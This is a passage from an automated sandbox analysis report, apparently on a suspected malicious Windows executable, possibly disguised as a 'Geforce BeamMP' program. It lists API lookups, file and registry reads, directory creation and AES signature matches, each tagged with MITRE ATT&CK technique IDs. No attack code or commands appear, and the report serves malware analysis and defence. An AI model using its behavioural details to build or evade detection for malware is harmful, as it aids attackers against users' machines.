\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter SetThreadErrorMode (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CreateFile (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetFileType (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter BCryptGetFipsAlgorithmMode (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CryptGetDefaultProviderW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CryptGenRandom (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessId (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessIdW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter LookupPrivilegeValue (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter LookupPrivilegeValueW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter AdjustTokenPrivileges (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter AdjustTokenPrivilegesW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter OpenProcess (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter OpenProcessW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter EnumProcessModules (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter EnumProcessModulesW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetModuleInformation (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetModuleInformationW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetModuleBaseName (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetModuleBaseNameW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameEx (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameExW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetCurrentThread (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter DuplicateHandle (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter IsAppThemed (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter IsAppThemedW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CreateActCtx (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CreateActCtxA (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter RegisterWindowMessage (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter RegisterWindowMessageW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetSystemMetrics (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetModuleHandle (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter WideCharToMultiByte (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter LoadLibraryEx (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter LoadLibraryExW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter AdjustWindowRectEx (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetCurrentActCtx (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ActivateActCtx (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter DefWindowProcW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetStockObject (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter RegisterClass (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter RegisterClassW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CreateWindowEx (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CreateWindowExW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter SetWindowLong (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter SetWindowLongW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetWindowLong (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetWindowLongW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CallWindowProc (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CallWindowProcW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetClientRect (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetWindowRect (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetParent (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter DeactivateActCtx (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetUserObjectInformation (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetUserObjectInformationA (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter SetConsoleCtrlHandler (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter SetConsoleCtrlHandlerW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetClassInfo (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetClassInfoW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter DefWindowProc (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetStartupInfo (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetDC (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetDeviceCaps (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ReleaseDC (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CreateIconFromResourceEx (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter SendMessage (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter SendMessageW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetSystemMenu (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetWindowPlacement (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter EnableMenuItem (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetWindowTextLength (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetWindowTextLengthW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetWindowText (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetWindowTextW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter SetWindowPos (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter RedrawWindow (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ShowWindow (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetFocus (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter EnumThreadWindows (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter DestroyWindow (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPath (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CryptCreateHash (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CryptHashData (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CryptGetHashParam (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CryptDestroyHash (UID: 00000000-00005912)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"0d000e0022038b6b@ADVAPI32.dll\"\n \"0d000e00fe028b6b@ADVAPI32.dll\"\n \"0b000c00cc028b6b@ADVAPI32.dll\"\n \"10001100da028b6b@ADVAPI32.dll\"\n \"15001600c03ecc6c@ADVAPI32.dll\"\n \"0e000f00703fcc6c@ADVAPI32.dll\"\n \"0e000f00cc3fcc6c@ADVAPI32.dll\"\n \"11001200b447cc6c@ADVAPI32.dll\"\n \"110012004848cc6c@ADVAPI32.dll\"\n \"120013008c48cc6c@ADVAPI32.dll\"\n \"12001300e448cc6c@ADVAPI32.dll\"\n \"14001500386ecc6c@ADVAPI32.dll\"\n \"14001500506ecc6c@ADVAPI32.dll\"\n \"14001500686ecc6c@ADVAPI32.dll\"\n \"17001800806ecc6c@ADVAPI32.dll\"\n \"0d000e00986ecc6c@ADVAPI32.dll\"\n \"11001200a86ecc6c@ADVAPI32.dll\"\n \"11001200bc6ecc6c@ADVAPI32.dll\"\n \"0f001000fc6fcc6c@ADVAPI32.dll\"\n \"140015003c70cc6c@ADVAPI32.dll\"\n \"140015005470cc6c@ADVAPI32.dll\"\n \"0c000d009c70cc6c@ADVAPI32.dll\"\n \"0c000d00ac70cc6c@ADVAPI32.dll\"\n \"0e000f00bc70cc6c@ADVAPI32.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00005912)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "Pattern Matching", "identifier": "yara-103", "type": 13, "relevance": 5, "name": "YARA signature match - AES encryption", "description": "YARA signature for AES encryption matched on file \"sample.bin\"\n YARA signature for AES encryption matched on file \"Geforce BeamMP.exe.2108408080\"", "origin": "YARA Signature", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-2.dll\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-0.dll\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\VCRUNTIME140_CLR0400.dll\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ucrtbase_clr0400.dll\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-quirks-l1-1-0.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" reads file \"c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll.aux\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\0b2f69b43a576b9edcc807a30872bd91\\system.ni.dll.aux\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll.aux\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\system.windows.forms.ni.dll.aux\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\system.drawing.ni.dll.aux\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\96f7edb07b12303f0ec2595c7f3778c7\\system.configuration.ni.dll.aux\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\31fae3290fad30c31c98651462d22724\\system.core.ni.dll.aux\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\15af16d373cf0528cb74fc73d365fdbf\\system.xml.ni.dll.aux\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n 